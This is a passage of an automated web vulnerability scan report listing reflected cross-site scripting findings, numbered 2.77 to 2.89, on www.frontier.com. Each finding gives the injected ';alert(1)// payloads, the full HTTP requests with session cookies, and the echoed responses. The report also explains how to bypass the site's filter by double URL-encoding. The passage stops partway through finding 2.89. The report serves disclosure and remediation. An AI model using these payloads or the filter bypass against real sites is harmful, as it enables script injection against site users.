$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.cssaeffb';alert(1)//9b1214b2e90');//]]>
...[SNIP]...

2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a38%2527%253balert%25281%2529%252f%252f6b3936757b1 was submitted in the REST URL parameter 1. This input was echoed as 34a38';alert(1)//6b3936757b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e116734a38%2527%253balert%25281%2529%252f%252f6b3936757b1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e116734a38';alert(1)//6b3936757b1');//]]>
...[SNIP]...

2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476a4'%3balert(1)//9376138f416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 476a4';alert(1)//9376138f416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167?476a4'%3balert(1)//9376138f416=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167?476a4';alert(1)//9376138f416=1');//]]>
...[SNIP]...

2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 was submitted in the REST URL parameter 1. This input was echoed as 9f242';alert(1)//a3ed4687c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e11679f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e11679f242';alert(1)//a3ed4687c09');//]]>
...[SNIP]...

2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0230'%3balert(1)//e42e942ef78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0230';alert(1)//e42e942ef78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167?a0230'%3balert(1)//e42e942ef78=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e1167?a0230';alert(1)//e42e942ef78=1');//]]>
...[SNIP]...

2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a972%2527%253balert%25281%2529%252f%252f878740809af was submitted in the REST URL parameter 2. This input was echoed as 4a972';alert(1)//878740809af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspx4a972%2527%253balert%25281%2529%252f%252f878740809af/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/SharedWebMethods.aspx4a972';alert(1)//878740809af/GetCurrentLocale');//]]>
...[SNIP]...

2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7979'%3bfb5ed37a6ba was submitted in the REST URL parameter 1. This input was echoed as f7979';fb5ed37a6ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsf7979'%3bfb5ed37a6ba/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsf7979';fb5ed37a6ba/VirtualCode.ashx');//]]>
...[SNIP]...

2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb66e%2527%253balert%25281%2529%252f%252f3775dfb9153 was submitted in the REST URL parameter 2. This input was echoed as cb66e';alert(1)//3775dfb9153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashxcb66e%2527%253balert%25281%2529%252f%252f3775dfb9153?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/VirtualCode.ashxcb66e';alert(1)//3775dfb9153?pageid=73&origPath=/topNav.css/');//]]>
...[SNIP]...

2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d86%2527%253balert%25281%2529%252f%252f44493412d91 was submitted in the REST URL parameter 1. This input was echoed as c3d86';alert(1)//44493412d91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Imagesc3d86%2527%253balert%25281%2529%252f%252f44493412d91/Common/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Imagesc3d86';alert(1)//44493412d91/Common/form_bg.gif');//]]>
...[SNIP]...

2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7 was submitted in the REST URL parameter 2. This input was echoed as 80d1c';alert(1)//47a4aeee6e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common80d1c';alert(1)//47a4aeee6e7/form_bg.gif');//]]>
...[SNIP]...

2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 was submitted in the REST URL parameter 3. This input was echoed as 970f4';alert(1)//f20c2fa2242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common/form_bg.gif970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif970f4';alert(1)//f20c2fa2242');//]]>
...[SNIP]...

2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56f6'%3balert(1)//227d16cdf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b56f6';alert(1)//227d16cdf97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/Common/form_bg.gif?b56f6'%3balert(1)//227d16cdf97=1 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif?b56f6';alert(1)//227d16cdf97=1');//]]>
...[SNIP]...

2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17124%2527%253balert%25281%2529%252f%252fdf531ca5181 was submitted in the REST URL parameter 1. This input was echoed as 17124';alert(1)//df531ca5181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo17124%2527%253balert%25281%2529%252f%252fdf531ca5181/fpsearchlg.asp?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo17124';alert(1)//df531ca5181/fpsearchlg.asp?type=biz');//]]>
...[SNIP]...

2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

